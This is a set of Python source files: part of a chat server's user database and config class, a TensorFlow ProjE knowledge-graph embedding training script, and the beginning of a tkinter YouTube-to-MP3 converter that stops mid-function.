return self._GetColumns("*")
def GetUserNames(self) -> list:
return self._GetColumns("username")
def GetAllPrivateUUIDS(self) -> list:
# um = self._GetColumn("(public_uuid, private_uuid)")
return self._GetColumns("private_uuid")
def GetAllPublicUUIDS(self) -> list:
return self._GetColumns("public_uuid")
def IsUserAddedPrivate(self, private_uuid: str) -> bool:
return self._IsUserAddedInternal("private_uuid", private_uuid)
def IsUserAdded(self, public_uuid: str) -> bool:
return self._IsUserAddedInternal("public_uuid", public_uuid)
def _IsUserAddedInternal(self, uuid_type: str, uuid: str) -> bool:
return uuid in self._GetColumns(uuid_type)
def GetUserInfoPrivate(self, private_uuid: str) -> UserInfo:
for user_info in self.users:
if user_info.private_uuid == private_uuid:
return user_info
def GetUserInfo(self, public_uuid: str) -> UserInfo:
for user_info in self.users:
if user_info.public_uuid == public_uuid:
return user_info
@staticmethod
def _MakeUUID(uuid_list: list) -> UUID:
while True:
new_uuid = uuid4()
if str(new_uuid) not in uuid_list:
return new_uuid
def MakePrivateUUID(self) -> UUID:
return self._MakeUUID(self.GetAllPrivateUUIDS())
def MakePublicUUID(self) -> UUID:
return self._MakeUUID(self.GetAllPublicUUIDS())
def MakeUserTag(self, username: str) -> int:
return self.GetUserNames().count((username, ))
def HandleUserJoin(self, username: str, user_tag: int, public_uuid: str, private_uuid: str, user_picture: str = ""):
if self.IsUserAddedPrivate(private_uuid):
self.UpdateUserInfo(public_uuid, username, user_picture, datetime.datetime.now().timestamp())
else:
self.AddUser(username, user_tag, public_uuid, private_uuid, user_picture)
def HandleUserLeave(self, public_uuid: str):
self.UpdateUserInfo(public_uuid, "", "", datetime.datetime.now().timestamp())
def AddUser(self, username: str, user_tag: int, public_uuid: str, private_uuid: str, user_picture: str = ""):
file, cursor = self.OpenFile()
join_date = datetime.datetime.now().timestamp()
user_tuple = (username, user_tag, user_picture, public_uuid, private_uuid, join_date, join_date)
cursor.execute(
"""INSERT INTO users (username, user_tag, user_picture, public_uuid, private_uuid, join_date, last_seen)
VALUES (?, ?, ?, ?, ?, ?, ?);""", user_tuple)
user = UserInfo(*user_tuple)
self.users.append(user)
self.SaveAndClose(file)
def UpdateUserInfo(self, public_uuid: str, username: str = "", user_picture: str = "", last_seen: float = -1.0):
file, cursor = self.OpenFile()
user_info = self.GetUserInfo(public_uuid)
user_info.Update(username, user_picture, last_seen)
cursor.execute("UPDATE users SET username = ?;", (username,))
cursor.execute("UPDATE users SET user_picture = ?;", (user_picture,))
cursor.execute("UPDATE users SET last_seen = ?;", (last_seen,))
self.SaveAndClose(file)
class ServerConfig:
def __init__(self, server: Server) -> None:
try:
self.dkv_input = dkv.ReadFile(SERVER_CONFIG_PATH)
except FileNotFoundError:
# create an empty file
with open(SERVER_CONFIG_PATH, "w", encoding="utf-8") as file:
pass
self.dkv_input = dkv.DemezKeyValueRoot()
server_name = self.dkv_input.GetItem("name")
if server_name:
server.name = server_name.value
else:
server.name = "default"
self.dkv_input.AddItem("name", "default")
channel_list = self.dkv_input.GetItem("channels")
if channel_list:
for channel_dkv in channel_list.value:
channel = Channel(channel_dkv.key)
server.channel_list.append(channel)
else:
self.dkv_input.AddItem("channels", []).AddItem("default", [])
channel = Channel("default")
server.channel_list.append(channel)
user_uuid_list = self.dkv_input.GetItem("user_uuids")
if user_uuid_list:
for user_uuid in user_uuid_list.value:
server.client_uuid_list[user_uuid.key] = UUID(user_uuid.key)
else:
self.dkv_input.AddItem("user_uuids", [])
print("server config done")
def AddChannel(self, channel_name: str) -> None:
self.dkv_input.GetItem("channels").AddItem(channel_name, [])
self.WriteChanges()
def SetServerName(self, server_name: str) -> None:
self.dkv_input.GetItem("name").value = server_name
self.WriteChanges()
def WriteChanges(self) -> None:
if os.path.isfile(SERVER_CONFIG_PATH):
os.rename(SERVER_CONFIG_PATH, SERVER_CONFIG_PATH + ".bak")
with open(SERVER_CONFIG_PATH, "w", encoding="utf-8") as file:
file.write(self.dkv_input.ToString())
if os.path.isfile(SERVER_CONFIG_PATH + ".bak"):
os.remove(SERVER_CONFIG_PATH + ".bak")
|
ProjE_sigmoid.py
|
import argparse
import math
import os.path
import timeit
from multiprocessing import JoinableQueue, Queue, Process
import numpy as np
import tensorflow as tf
class ProjE:
@property
def n_entity(self):
return self.__n_entity
@property
def n_train(self):
return self.__train_triple.shape[0]
@property
def trainable_variables(self):
return self.__trainable
@property
def hr_t(self):
return self.__hr_t
@property
def tr_h(self):
return self.__tr_h
@property
def ent_embedding(self):
return self.__ent_embedding
@property
def rel_embedding(self):
return self.__rel_embedding
def training_data(self, batch_size=100):
n_triple = len(self.__train_triple)
rand_idx = np.random.permutation(n_triple)
start = 0
while start < n_triple:
end = min(start + batch_size, n_triple)
hr_tlist, hr_tweight, tr_hlist, tr_hweight = self.corrupted_training(
self.__train_triple[rand_idx[start:end]])
yield hr_tlist, hr_tweight, tr_hlist, tr_hweight
start = end
def raw_training_data(self, batch_size=100):
n_triple = len(self.__train_triple)
rand_idx = np.random.permutation(n_triple)
start = 0
while start < n_triple:
end = min(start + batch_size, n_triple)
yield self.__train_triple[rand_idx[start:end]]
start = end
def testing_data(self, batch_size=100):
n_triple = len(self.__test_triple)
start = 0
while start < n_triple:
end = min(start + batch_size, n_triple)
yield self.__test_triple[start:end, :]
start = end
def validation_data(self, batch_size=100):
n_triple = len(self.__valid_triple)
start = 0
while start < n_triple:
end = min(start + batch_size, n_triple)
yield self.__test_triple[start:end, :]
start = end
def corrupted_training(self, htr):
# [head(tail), relation, #of_total_positive_candidates, positive_instances..., negative_instances...]
hr_tlist = list()
hr_tweight = list()
tr_hlist = list()
tr_hweight = list()
for idx in range(htr.shape[0]):
if np.random.uniform(-1, 1) > 0: # t r predict h
tr_hweight.append(
[1. if x in self.__tr_h[htr[idx, 1]][htr[idx, 2]] else 0. for x in range(self.__n_entity)])
tr_hlist.append([htr[idx, 1], htr[idx, 2]])
else: # h r predict t
hr_tweight.append(
[1. if x in self.__hr_t[htr[idx, 0]][htr[idx, 2]] else 0. for x in range(self.__n_entity)])
hr_tlist.append([htr[idx, 0], htr[idx, 2]])
return np.asarray(hr_tlist, dtype=np.int32), np.asarray(hr_tweight, dtype=np.float32), \
np.asarray(tr_hlist, dtype=np.int32), np.asarray(tr_hweight, dtype=np.float32)
def __init__(self, data_dir, embed_dim=100, combination_method='simple', dropout=0.5, neg_weight=0.5):
if combination_method.lower() not in ['simple', 'matrix']:
raise NotImplementedError("ProjE does not support using %s as combination method." % combination_method)
self.__combination_method = combination_method
self.__embed_dim = embed_dim
self.__initialized = False
self.__trainable = list()
self.__dropout = dropout
with open(os.path.join(data_dir, 'entity2id.txt'), 'r', encoding='utf-8') as f:
self.__n_entity = len(f.readlines())
with open(os.path.join(data_dir, 'entity2id.txt'), 'r', encoding='utf-8') as f:
self.__entity_id_map = {x.strip().split('\t')[0]: int(x.strip().split('\t')[1]) for x in f.readlines()}
self.__id_entity_map = {v: k for k, v in self.__entity_id_map.items()}
print("N_ENTITY: %d" % self.__n_entity)
with open(os.path.join(data_dir, 'relation2id.txt'), 'r', encoding='utf-8') as f:
self.__n_relation = len(f.readlines())
with open(os.path.join(data_dir, 'relation2id.txt'), 'r', encoding='utf-8') as f:
self.__relation_id_map = {x.strip().split('\t')[0]: int(x.strip().split('\t')[1]) for x in f.readlines()}
self.__id_relation_map = {v: k for k, v in self.__entity_id_map.items()}
print("N_RELATION: %d" % self.__n_relation)
def load_triple(file_path):
with open(file_path, 'r', encoding='utf-8') as f_triple:
return np.asarray([[self.__entity_id_map[x.strip().split('\t')[0]],
self.__entity_id_map[x.strip().split('\t')[1]],
self.__relation_id_map[x.strip().split('\t')[2]]] for x in f_triple.readlines()],
dtype=np.int32)
def gen_hr_t(triple_data):
hr_t = dict()
for h, t, r in triple_data:
if h not in hr_t:
hr_t[h] = dict()
if r not in hr_t[h]:
hr_t[h][r] = set()
hr_t[h][r].add(t)
return hr_t
def gen_tr_h(triple_data):
tr_h = dict()
for h, t, r in triple_data:
if t not in tr_h:
tr_h[t] = dict()
if r not in tr_h[t]:
tr_h[t][r] = set()
tr_h[t][r].add(h)
return tr_h
self.__train_triple = load_triple(os.path.join(data_dir, 'train.txt'))
print("N_TRAIN_TRIPLES: %d" % self.__train_triple.shape[0])
self.__test_triple = load_triple(os.path.join(data_dir, 'test.txt'))
print("N_TEST_TRIPLES: %d" % self.__test_triple.shape[0])
self.__valid_triple = load_triple(os.path.join(data_dir, 'valid.txt'))
print("N_VALID_TRIPLES: %d" % self.__valid_triple.shape[0])
self.__train_hr_t = gen_hr_t(self.__train_triple)
self.__train_tr_h = gen_tr_h(self.__train_triple)
self.__test_hr_t = gen_hr_t(self.__test_triple)
self.__test_tr_h = gen_tr_h(self.__test_triple)
self.__hr_t = gen_hr_t(np.concatenate([self.__train_triple, self.__test_triple, self.__valid_triple], axis=0))
self.__tr_h = gen_tr_h(np.concatenate([self.__train_triple, self.__test_triple, self.__valid_triple], axis=0))
bound = 6 / math.sqrt(embed_dim)
with tf.device('/cpu'):
self.__ent_embedding = tf.get_variable("ent_embedding", [self.__n_entity, embed_dim],
initializer=tf.random_uniform_initializer(minval=-bound,
maxval=bound,
seed=345))
self.__trainable.append(self.__ent_embedding)
self.__rel_embedding = tf.get_variable("rel_embedding", [self.__n_relation, embed_dim],
initializer=tf.random_uniform_initializer(minval=-bound,
maxval=bound,
seed=346))
self.__trainable.append(self.__rel_embedding)
if combination_method.lower() == 'simple':
self.__hr_weighted_vector = tf.get_variable("simple_hr_combination_weights", [embed_dim * 2],
initializer=tf.random_uniform_initializer(minval=-bound,
maxval=bound,
seed=445))
self.__tr_weighted_vector = tf.get_variable("simple_tr_combination_weights", [embed_dim * 2],
initializer=tf.random_uniform_initializer(minval=-bound,
maxval=bound,
seed=445))
self.__trainable.append(self.__hr_weighted_vector)
self.__trainable.append(self.__tr_weighted_vector)
self.__hr_combination_bias = tf.get_variable("combination_bias_hr",
initializer=tf.zeros([embed_dim]))
self.__tr_combination_bias = tf.get_variable("combination_bias_tr",
initializer=tf.zeros([embed_dim]))
self.__trainable.append(self.__hr_combination_bias)
self.__trainable.append(self.__tr_combination_bias)
else:
self.__hr_combination_matrix = tf.get_variable("matrix_hr_combination_layer",
[embed_dim * 2, embed_dim],
initializer=tf.random_uniform_initializer(minval=-bound,
maxval=bound,
seed=555))
self.__tr_combination_matrix = tf.get_variable("matrix_tr_combination_layer",
[embed_dim * 2, embed_dim],
initializer=tf.random_uniform_initializer(minval=-bound,
maxval=bound,
seed=555))
self.__trainable.append(self.__hr_combination_matrix)
self.__trainable.append(self.__tr_combination_matrix)
self.__hr_combination_bias = tf.get_variable("combination_bias_hr",
initializer=tf.zeros([embed_dim]))
self.__tr_combination_bias = tf.get_variable("combination_bias_tr",
initializer=tf.zeros([embed_dim]))
self.__trainable.append(self.__hr_combination_bias)
self.__trainable.append(self.__tr_combination_bias)
@staticmethod
def __l1_normalize(x, dim, epsilon=1e-12, name=None):
square_sum = tf.reduce_sum(tf.abs(x), [dim], keep_dims=True)
x_inv_norm = tf.rsqrt(tf.maximum(square_sum, epsilon))
return tf.mul(x, x_inv_norm, name=name)
@staticmethod
def sampled_softmax(tensor, weights):
max_val = tf.reduce_max(tensor * tf.abs(weights), 1, keep_dims=True)
tensor_rescaled = tensor - max_val
tensor_exp = tf.exp(tensor_rescaled)
tensor_sum = tf.reduce_sum(tensor_exp * tf.abs(weights), 1, keep_dims=True)
return (tensor_exp / tensor_sum) * tf.abs(weights) # all ignored elements will have a prob of 0.
def train(self, inputs, regularizer_weight=1., scope=None):
with tf.variable_scope(scope or type(self).__name__) as scp:
if self.__initialized:
scp.reuse_variables()
rel_embedding = self.__rel_embedding
normalized_ent_embedding = self.__ent_embedding
hr_tlist, hr_tlist_weight, tr_hlist, tr_hlist_weight = inputs
# (?, dim)
hr_tlist_h = tf.nn.embedding_lookup(normalized_ent_embedding, hr_tlist[:, 0])
hr_tlist_r = tf.nn.embedding_lookup(rel_embedding, hr_tlist[:, 1])
# (?, dim)
tr_hlist_t = tf.nn.embedding_lookup(normalized_ent_embedding, tr_hlist[:, 0])
tr_hlist_r = tf.nn.embedding_lookup(rel_embedding, tr_hlist[:, 1])
if self.__combination_method.lower() == 'simple':
# shape (?, dim)
hr_tlist_hr = hr_tlist_h * self.__hr_weighted_vector[
:self.__embed_dim] + hr_tlist_r * self.__hr_weighted_vector[
self.__embed_dim:]
hrt_res = tf.matmul(tf.nn.dropout(tf.tanh(hr_tlist_hr + self.__hr_combination_bias), self.__dropout),
self.__ent_embedding,
transpose_b=True)
tr_hlist_tr = tr_hlist_t * self.__tr_weighted_vector[
:self.__embed_dim] + tr_hlist_r * self.__tr_weighted_vector[
self.__embed_dim:]
trh_res = tf.matmul(tf.nn.dropout(tf.tanh(tr_hlist_tr + self.__tr_combination_bias), self.__dropout),
self.__ent_embedding,
transpose_b=True)
self.regularizer_loss = regularizer_loss = tf.reduce_sum(
tf.abs(self.__hr_weighted_vector)) + tf.reduce_sum(tf.abs(
self.__tr_weighted_vector)) + tf.reduce_sum(tf.abs(self.__ent_embedding)) + tf.reduce_sum(
tf.abs(self.__rel_embedding))
else:
hr_tlist_hr = tf.nn.dropout(tf.tanh(tf.matmul(tf.concat(1, [hr_tlist_h, hr_tlist_r]),
self.__hr_combination_matrix) + self.__hr_combination_bias),
self.__dropout)
hrt_res = tf.matmul(hr_tlist_hr, self.__ent_embedding, transpose_b=True)
tr_hlist_tr = tf.nn.dropout(tf.tanh(tf.matmul(tf.concat(1, [tr_hlist_t, tr_hlist_r]),
self.__tr_combination_matrix) + self.__tr_combination_bias),
self.__dropout)
trh_res = tf.matmul(tr_hlist_tr, self.__ent_embedding, transpose_b=True)
self.regularizer_loss = regularizer_loss = tf.reduce_sum(
tf.abs(self.__hr_combination_matrix)) + tf.reduce_sum(tf.abs(
self.__tr_combination_matrix)) + tf.reduce_sum(tf.abs(self.__ent_embedding)) + tf.reduce_sum(
tf.abs(self.__rel_embedding))
hrt_res_sigmoid = tf.sigmoid(hrt_res)
hrt_loss = -tf.reduce_sum(
tf.log(tf.clip_by_value(hrt_res_sigmoid, 1e-10, 1.0)) * tf.maximum(0., hr_tlist_weight)
+ tf.log(tf.clip_by_value(1 - hrt_res_sigmoid, 1e-10, 1.0)) * tf.maximum(0., tf.neg(hr_tlist_weight)))
trh_res_sigmoid = tf.sigmoid(trh_res)
trh_loss = -tf.reduce_sum(
tf.log(tf.clip_by_value(trh_res_sigmoid, 1e-10, 1.0)) * tf.maximum(0., tr_hlist_weight)
+ tf.log(tf.clip_by_value(1 - trh_res_sigmoid, 1e-10, 1.0)) * tf.maximum(0., tf.neg(tr_hlist_weight)))
return hrt_loss + trh_loss + regularizer_loss * regularizer_weight
def test(self, inputs, scope=None):
with tf.variable_scope(scope or type(self).__name__) as scp:
scp.reuse_variables()
h = tf.nn.embedding_lookup(self.__ent_embedding, inputs[:, 0])
t = tf.nn.embedding_lookup(self.__ent_embedding, inputs[:, 1])
r = tf.nn.embedding_lookup(self.__rel_embedding, inputs[:, 2])
ent_mat = tf.transpose(self.__ent_embedding)
if self.__combination_method.lower() == 'simple':
# predict tails
hr = h * self.__hr_weighted_vector[:self.__embed_dim] + r * self.__hr_weighted_vector[
self.__embed_dim:]
hrt_res = tf.sigmoid(tf.matmul(tf.tanh(hr + self.__hr_combination_bias), ent_mat))
_, tail_ids = tf.nn.top_k(hrt_res, k=self.__n_entity)
# predict heads
tr = t * self.__tr_weighted_vector[:self.__embed_dim] + r * self.__tr_weighted_vector[self.__embed_dim:]
trh_res = tf.sigmoid(tf.matmul(tf.tanh(tr + self.__tr_combination_bias), ent_mat))
_, head_ids = tf.nn.top_k(trh_res, k=self.__n_entity)
else:
hr = tf.matmul(tf.concat(1, [h, r]), self.__hr_combination_matrix)
hrt_res = tf.sigmoid(tf.matmul(tf.tanh(hr + self.__hr_combination_bias), ent_mat))
_, tail_ids = tf.nn.top_k(hrt_res, k=self.__n_entity)
tr = tf.matmul(tf.concat(1, [t, r]), self.__tr_combination_matrix)
trh_res = tf.sigmoid(tf.matmul(tf.tanh(tr + self.__tr_combination_bias), ent_mat))
_, head_ids = tf.nn.top_k(trh_res, k=self.__n_entity)
return head_ids, tail_ids
def train_ops(model: ProjE, learning_rate=0.1, optimizer_str='gradient', regularizer_weight=1.0):
with tf.device('/cpu'):
train_hrt_input = tf.placeholder(tf.int32, [None, 2])
train_hrt_weight = tf.placeholder(tf.float32, [None, model.n_entity])
train_trh_input = tf.placeholder(tf.int32, [None, 2])
train_trh_weight = tf.placeholder(tf.float32, [None, model.n_entity])
loss = model.train([train_hrt_input, train_hrt_weight, train_trh_input, train_trh_weight],
regularizer_weight=regularizer_weight)
if optimizer_str == 'gradient':
optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
elif optimizer_str == 'rms':
optimizer = tf.train.RMSPropOptimizer(learning_rate=learning_rate)
elif optimizer_str == 'adam':
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
else:
raise NotImplementedError("Does not support %s optimizer" % optimizer_str)
grads = optimizer.compute_gradients(loss, model.trainable_variables)
op_train = optimizer.apply_gradients(grads)
return train_hrt_input, train_hrt_weight, train_trh_input, train_trh_weight, loss, op_train
def test_ops(model: ProjE):
with tf.device('/cpu'):
test_input = tf.placeholder(tf.int32, [None, 3])
head_ids, tail_ids = model.test(test_input)
return test_input, head_ids, tail_ids
def worker_func(in_queue: JoinableQueue, out_queue: Queue, hr_t, tr_h):
while True:
dat = in_queue.get()
if dat is None:
in_queue.task_done()
continue
testing_data, head_pred, tail_pred = dat
out_queue.put(test_evaluation(testing_data, head_pred, tail_pred, hr_t, tr_h))
in_queue.task_done()
def data_generator_func(in_queue: JoinableQueue, out_queue: Queue, tr_h, hr_t, n_entity, neg_weight):
while True:
dat = in_queue.get()
if dat is None:
break
# [head(tail), relation, #of_total_positive_candidates, positive_instances..., negative_instances...]
hr_tlist = list()
hr_tweight = list()
tr_hlist = list()
tr_hweight = list()
htr = dat
for idx in range(htr.shape[0]):
if np.random.uniform(-1, 1) > 0: # t r predict h
tr_hweight.append(
[1. if x in tr_h[htr[idx, 1]][htr[idx, 2]] else y for
x, y in enumerate(np.random.choice([0., -1.], size=n_entity, p=[1 - neg_weight, neg_weight]))])
tr_hlist.append([htr[idx, 1], htr[idx, 2]])
else: # h r predict t
hr_tweight.append(
[1. if x in hr_t[htr[idx, 0]][htr[idx, 2]] else y for
x, y in enumerate(np.random.choice([0., -1.], size=n_entity, p=[1 - neg_weight, neg_weight]))])
hr_tlist.append([htr[idx, 0], htr[idx, 2]])
out_queue.put((np.asarray(hr_tlist, dtype=np.int32), np.asarray(hr_tweight, dtype=np.float32),
np.asarray(tr_hlist, dtype=np.int32), np.asarray(tr_hweight, dtype=np.float32)))
def test_evaluation(testing_data, head_pred, tail_pred, hr_t, tr_h):
assert len(testing_data) == len(head_pred)
assert len(testing_data) == len(tail_pred)
mean_rank_h = list()
mean_rank_t = list()
filtered_mean_rank_h = list()
filtered_mean_rank_t = list()
for i in range(len(testing_data)):
h = testing_data[i, 0]
t = testing_data[i, 1]
r = testing_data[i, 2]
# mean rank
mr = 0
for val in head_pred[i]:
if val == h:
mean_rank_h.append(mr)
break
mr += 1
mr = 0
for val in tail_pred[i]:
if val == t:
mean_rank_t.append(mr)
mr += 1
# filtered mean rank
fmr = 0
for val in head_pred[i]:
if val == h:
filtered_mean_rank_h.append(fmr)
break
if t in tr_h and r in tr_h[t] and val in tr_h[t][r]:
continue
else:
fmr += 1
fmr = 0
for val in tail_pred[i]:
if val == t:
filtered_mean_rank_t.append(fmr)
break
if h in hr_t and r in hr_t[h] and val in hr_t[h][r]:
continue
else:
fmr += 1
return (mean_rank_h, filtered_mean_rank_h), (mean_rank_t, filtered_mean_rank_t)
def main(_):
parser = argparse.ArgumentParser(description='ProjE.')
parser.add_argument('--data', dest='data_dir', type=str, help="Data folder", default='./data/FB15k/')
parser.add_argument('--lr', dest='lr', type=float, help="Learning rate", default=0.01)
parser.add_argument("--dim", dest='dim', type=int, help="Embedding dimension", default=200)
parser.add_argument("--batch", dest='batch', type=int, help="Batch size", default=200)
parser.add_argument("--comb", dest="combination_method", type=str, help="Combination method", default='simple')
parser.add_argument("--worker", dest='n_worker', type=int, help="Evaluation worker", default=3)
parser.add_argument("--generator", dest='n_generator', type=int, help="Data generator", default=10)
parser.add_argument("--eval_batch", dest="eval_batch", type=int, help="Evaluation batch size", default=500)
parser.add_argument("--save_dir", dest='save_dir', type=str, help="Model path", default='./')
parser.add_argument("--load_model", dest='load_model', type=str, help="Model file", default="")
parser.add_argument("--save_per", dest='save_per', type=int, help="Save per x iteration", default=10)
parser.add_argument("--eval_per", dest='eval_per', type=int, help="Evaluate every x iteration", default=1)
parser.add_argument("--max_iter", dest='max_iter', type=int, help="Max iteration", default=100)
parser.add_argument("--summary_dir", dest='summary_dir', type=str, help="summary directory",
default='./ProjE_summary/')
parser.add_argument("--keep", dest='drop_out', type=float, help="Keep prob (1.0 keep all, 0. drop all)",
default=0.5)
parser.add_argument("--optimizer", dest='optimizer', type=str, help="Optimizer", default='adam')
parser.add_argument("--prefix", dest='prefix', type=str, help="model_prefix", default='DEFAULT')
parser.add_argument("--loss_weight", dest='loss_weight', type=float, help="Weight on parameter loss", default=1e-5)
parser.add_argument("--neg_weight", dest='neg_weight', type=float, help="Sampling weight on negative examples",
default=0.5)
args = parser.parse_args()
print(args)
model = ProjE(args.data_dir, embed_dim=args.dim, combination_method=args.combination_method,
dropout=args.drop_out, neg_weight=args.neg_weight)
train_hrt_input, train_hrt_weight, train_trh_input, train_trh_weight, \
train_loss, train_op = train_ops(model, learning_rate=args.lr,
optimizer_str=args.optimizer,
regularizer_weight=args.loss_weight)
test_input, test_head, test_tail = test_ops(model)
with tf.Session() as session:
tf.initialize_all_variables().run()
saver = tf.train.Saver()
iter_offset = 0
if args.load_model is not None and os.path.exists(args.load_model):
saver.restore(session, args.load_model)
iter_offset = int(args.load_model.split('.')[-2].split('_')[-1]) + 1
print("Load model from %s, iteration %d restored." % (args.load_model, iter_offset))
total_inst = model.n_train
# training data generator
raw_training_data_queue = Queue()
training_data_queue = Queue()
data_generators = list()
for i in range(args.n_generator):
data_generators.append(Process(target=data_generator_func, args=(
raw_training_data_queue, training_data_queue, model.tr_h, model.hr_t, model.n_entity, args.neg_weight)))
data_generators[-1].start()
evaluation_queue = JoinableQueue()
result_queue = Queue()
for i in range(args.n_worker):
worker = Process(target=worker_func, args=(evaluation_queue, result_queue, model.hr_t, model.tr_h))
worker.start()
for data_func, test_type in zip([model.validation_data, model.testing_data], ['VALID', 'TEST']):
accu_mean_rank_h = list()
accu_mean_rank_t = list()
accu_filtered_mean_rank_h = list()
accu_filtered_mean_rank_t = list()
evaluation_count = 0
for testing_data in data_func(batch_size=args.eval_batch):
head_pred, tail_pred = session.run([test_head, test_tail],
{test_input: testing_data})
evaluation_queue.put((testing_data, head_pred, tail_pred))
evaluation_count += 1
for i in range(args.n_worker):
evaluation_queue.put(None)
print("waiting for worker finishes their work")
evaluation_queue.join()
print("all worker stopped.")
while evaluation_count > 0:
evaluation_count -= 1
(mrh, fmrh), (mrt, fmrt) = result_queue.get()
accu_mean_rank_h += mrh
accu_mean_rank_t += mrt
accu_filtered_mean_rank_h += fmrh
accu_filtered_mean_rank_t += fmrt
print(
"[%s] INITIALIZATION [HEAD PREDICTION] MEAN RANK: %.1f FILTERED MEAN RANK %.1f HIT@10 %.3f FILTERED HIT@10 %.3f" %
(test_type, np.mean(accu_mean_rank_h), np.mean(accu_filtered_mean_rank_h),
np.mean(np.asarray(accu_mean_rank_h, dtype=np.int32) < 10),
np.mean(np.asarray(accu_filtered_mean_rank_h, dtype=np.int32) < 10)))
print(
"[%s] INITIALIZATION [TAIL PREDICTION] MEAN RANK: %.1f FILTERED MEAN RANK %.1f HIT@10 %.3f FILTERED HIT@10 %.3f" %
(test_type, np.mean(accu_mean_rank_t), np.mean(accu_filtered_mean_rank_t),
np.mean(np.asarray(accu_mean_rank_t, dtype=np.int32) < 10),
np.mean(np.asarray(accu_filtered_mean_rank_t, dtype=np.int32) < 10)))
for n_iter in range(iter_offset, args.max_iter):
start_time = timeit.default_timer()
accu_loss = 0.
accu_re_loss = 0.
ninst = 0
print("initializing raw training data...")
nbatches_count = 0
for dat in model.raw_training_data(batch_size=args.batch):
raw_training_data_queue.put(dat)
nbatches_count += 1
print("raw training data initialized.")
while nbatches_count > 0:
nbatches_count -= 1
hr_tlist, hr_tweight, tr_hlist, tr_hweight = training_data_queue.get()
l, rl, _ = session.run(
[train_loss, model.regularizer_loss, train_op], {train_hrt_input: hr_tlist,
train_hrt_weight: hr_tweight,
train_trh_input: tr_hlist,
train_trh_weight: tr_hweight})
accu_loss += l
accu_re_loss += rl
ninst += len(hr_tlist) + len(tr_hlist)
if ninst % (5000) is not None:
print(
'[%d sec](%d/%d) : %.2f -- loss : %.5f rloss: %.5f ' % (
timeit.default_timer() - start_time, ninst, total_inst, float(ninst) / total_inst,
l / (len(hr_tlist) + len(tr_hlist)),
args.loss_weight * (rl / (len(hr_tlist) + len(tr_hlist)))),
end='\r')
print("")
print("iter %d avg loss %.5f, time %.3f" % (n_iter, accu_loss / ninst, timeit.default_timer() - start_time))
if n_iter % args.save_per == 0 or n_iter == args.max_iter - 1:
save_path = saver.save(session,
os.path.join(args.save_dir,
"ProjE_" + str(args.prefix) + "_" + str(n_iter) + ".ckpt"))
print("Model saved at %s" % save_path)
if n_iter % args.eval_per == 0 or n_iter == args.max_iter - 1:
for data_func, test_type in zip([model.validation_data, model.testing_data], ['VALID', 'TEST']):
accu_mean_rank_h = list()
accu_mean_rank_t = list()
accu_filtered_mean_rank_h = list()
accu_filtered_mean_rank_t = list()
evaluation_count = 0
for testing_data in data_func(batch_size=args.eval_batch):
head_pred, tail_pred = session.run([test_head, test_tail],
{test_input: testing_data})
evaluation_queue.put((testing_data, head_pred, tail_pred))
evaluation_count += 1
for i in range(args.n_worker):
evaluation_queue.put(None)
print("waiting for worker finishes their work")
evaluation_queue.join()
print("all worker stopped.")
while evaluation_count > 0:
evaluation_count -= 1
(mrh, fmrh), (mrt, fmrt) = result_queue.get()
accu_mean_rank_h += mrh
accu_mean_rank_t += mrt
accu_filtered_mean_rank_h += fmrh
accu_filtered_mean_rank_t += fmrt
print(
"[%s] ITER %d [HEAD PREDICTION] MEAN RANK: %.1f FILTERED MEAN RANK %.1f HIT@10 %.3f FILTERED HIT@10 %.3f" %
(test_type, n_iter, np.mean(accu_mean_rank_h), np.mean(accu_filtered_mean_rank_h),
np.mean(np.asarray(accu_mean_rank_h, dtype=np.int32) < 10),
np.mean(np.asarray(accu_filtered_mean_rank_h, dtype=np.int32) < 10)))
print(
"[%s] ITER %d [TAIL PREDICTION] MEAN RANK: %.1f FILTERED MEAN RANK %.1f HIT@10 %.3f FILTERED HIT@10 %.3f" %
(test_type, n_iter, np.mean(accu_mean_rank_t), np.mean(accu_filtered_mean_rank_t),
np.mean(np.asarray(accu_mean_rank_t, dtype=np.int32) < 10),
np.mean(np.asarray(accu_filtered_mean_rank_t, dtype=np.int32) < 10)))
if __name__ == '__main__':
tf.app.run()
|
YTMC.py
|
from youtube_dl import YoutubeDL
import threading
from tkinter import (
Tk,
Label,
Button,
Menu,
PanedWindow,
Entry,
HORIZONTAL,
X,
Y,
BOTH,
END,
LEFT,
RIGHT,
DISABLED,
NORMAL,
)
class Youtube_To_MP3_Converter:
def __init__(self):
self.main_windows = Tk()
# ====================== init main windows ======================
# self.main_windows.protocol("WM_DELETE_WINDOW", self.close_app)
self.main_windows.title("YOUTUBE TO MP3 CONVERTER")
self.main_windows.minsize(300, 80)
self.main_windows.geometry("300x100")
# self.main_windows.iconbitmap("xxx.ico")
# ====================== menu top bar ======================
self.menubar = Menu(self.main_windows)
self.main_windows.config(menu=self.menubar)
# ====================== Entry ======================
self.youtube_url_Entry = Entry(self.main_windows)
self.youtube_url_Entry.pack(fill=X, padx=5, pady=5)
# ====================== panelwindow + buttons ======================
self.panelwindow = PanedWindow(
self.main_windows, orient=HORIZONTAL, width=self.main_windows.winfo_width()
)
self.panelwindow.pack(fill=BOTH)
self.bouton_exit = Button(self.panelwindow, text="EXIT", command=self.close_app)
self.bouton_exit.pack(side=LEFT, padx=5, pady=5)
self.bouton_start_convert = Button(
self.panelwindow,
text="Convert",
command=lambda: threading.Thread(
name="yt_mp3_convert_thread",
target=lambda: self.convert_to_MP3({self.youtube_url_Entry.get()}),
).start(),
)
self.bouton_start_convert.pack(side=RIGHT, padx=5, pady=5)
# ====================== Label ======================
self.Label_avancement = Label(
self.main_windows, text="place your URL and click on Convert"
)
self.Label_avancement.pack(fill=X, padx=5, pady=5)
self.Label_music_name = Label(self.main_windows, text="music :")
self.Label_music_name.pack(fill=X, padx=5, pady=5)
# ====================== Label ======================
self.main_windows.mainloop()
def close_app(self):
self.main_windows.quit()
def my_hook(self, d):
if d["status"] == "downloading":
self.Label_avancement.config(text="downloading")
self.Label_music_name.config(text="")
elif d["status"] == "error":
self.Label_avancement.config(text="!!!!ERROR!!!!")
elif d["status"] == "finished":
self.Label_avancement.config(text="Done downloading, now converting ...")
def convert_to_MP3(self, YT_link):
self.bouton_start_convert.config(state=DISABLED)
self.youtube_url_Entry.config(state=DISABLED)
self.Label_avancement.config(text="Start download")
try:
ydl_opts = {
"format": "bestaudio/best",
"postprocessors": [
{
"key": "FFmpegExtractAudio",
"preferredcodec": "mp3",
"preferredquality": "192",
}
],
"progress_hooks": [self.my_hook],
"outtmpl": "MP3_files/%(title)s.%(ext)s",
"ffmpeg_location": "ff/",
}
with YoutubeDL(ydl_opts) as youtube_dl:
